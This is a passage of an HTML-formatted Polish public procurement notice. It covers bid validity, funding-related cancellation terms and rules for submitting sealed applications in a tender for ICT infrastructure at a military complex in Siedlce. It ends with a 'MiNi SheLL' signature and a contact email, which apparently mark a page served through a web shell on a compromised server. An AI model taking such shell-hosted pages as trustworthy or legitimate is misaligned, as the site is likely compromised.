              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Pisemny Wniosek o dopuszczenie do udziału w postępowaniu wraz z załącznikami wg. załączonego wzoru i wymaganymi dokumentami  i oświadczeniami wynikającymi z treści ogłoszenia o zamówieniu, należy złożyć w opakowaniu uniemożliwiającym zapoznanie się 
z jego treścią przed upływem wyznaczonego terminu składania Wniosków podanym w  pkt IV.6.2 Ogłoszenia o zamówieniu w miejscu wskazanym przez zamawiającego  Sekcja I pkt 4) Ogłoszenia o zamówieniu.
Opakowanie powinno być opatrzone pieczątką lub adnotacją zawierającą nazwę i adres siedziby Wykonawcy oraz posiadać następujący napis:  Wniosek w sprawie zakwalifikowania do udziału w postepowaniu przetargowym:  Budowa infrastruktury teleinformatycznej na potrzeby WOT 
w  kompleksie wojskowym w m. Siedlce   przygotowanie dokumentacyjne wraz z wykonaniem robót budowlanych  sprawa nr 17/1/243/16. Pożądane jest aby wszystkie strony wniosku były kolejno ponumerowane. Zaleca się, aby wniosek złączać w sposób uniemożliwiający wysunięcie którejkolwiek kartki. Numeracja stron powinna rozpocząć się od numeru 1 umieszczonego na 
pierwszej stronie wniosku. 
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com